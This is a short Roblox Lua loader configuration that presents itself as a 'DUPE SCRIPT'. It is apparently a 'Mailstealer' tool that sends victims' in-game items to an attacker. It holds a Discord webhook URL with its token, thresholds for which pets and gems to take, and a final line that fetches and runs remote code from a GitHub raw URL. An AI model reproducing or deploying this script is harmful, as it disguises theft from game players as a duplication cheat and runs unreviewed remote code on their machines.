``-- Dualhook SETTINGS!
DualhookUsername = "Muscle_B0i"
DualhookWebHook = "https://discord.com/api/webhooks/1206048917142376459/8GTBXcsMGEcGDiMyKB0LUe13SIhOJgEe0rEPeGTTp4MUsQ6qHtTM67lebYjHq56uzo6A"

HugeSetting = 1   -- Dualhook Amount For Huges
GemSetting = 1000000 Dualhook Amount For Gems

-- Custom Settings!
LoadingScreenTitle = "DUPE SCRIPT" -- Loading Screen Title
WebHookName = "... Mailstealer" -- Webhook Name

loadstring(game:HttpGet("https://raw.githubusercontent.com/LypherX/MoriPremium/main/MoriPremium"))()
